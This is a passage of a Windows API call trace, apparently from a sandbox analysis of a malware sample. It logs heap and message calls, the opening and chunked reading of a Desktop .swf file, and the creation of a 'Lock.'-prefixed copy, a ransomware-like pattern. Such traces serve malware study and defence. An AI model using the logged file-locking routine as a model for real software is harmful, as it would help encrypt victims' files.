[0188.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0188.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0188.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0188.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0188.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0188.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0188.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0188.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0188.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0188.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0188.878] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.878] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.878] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.878] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/QzBYTrrsKyNkrz7Qz2.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qzbytrrskynkrz7qz2.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0188.879] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.879] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0188.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0188.879] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.879] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.879] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0188.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0188.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.880] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.QzBYTrrsKyNkrz7Qz2.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.qzbytrrskynkrz7qz2.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0188.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0188.899] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0188.899] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.899] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0188.899] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0188.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0188.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.899] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0188.899] ReadFile (in: hFile=0x294, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0188.902] ReadFile (in: hFile=0x294, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x78b5, lpOverlapped=0x0) returned 1 [0188.902] ReadFile (in: hFile=0x294, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0188.903] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0188.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x178b5) returned 0x34d2260 [0188.904] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0188.904] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0188.904] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0188.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0188.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0188.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x178b5) returned 0x34d2260 [0188.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bf8 [0188.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0188.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0188.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0188.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2db8 [0188.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0188.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0188.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0188.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x178b5) returned 0x24cf308 [0188.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0188.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0188.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0188.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0188.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0188.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0188.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0188.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0188.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0188.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0188.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0188.908] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.908] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0188.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.909] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.909] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0188.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0188.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.910] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0188.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0188.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0188.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.910] HeapFree 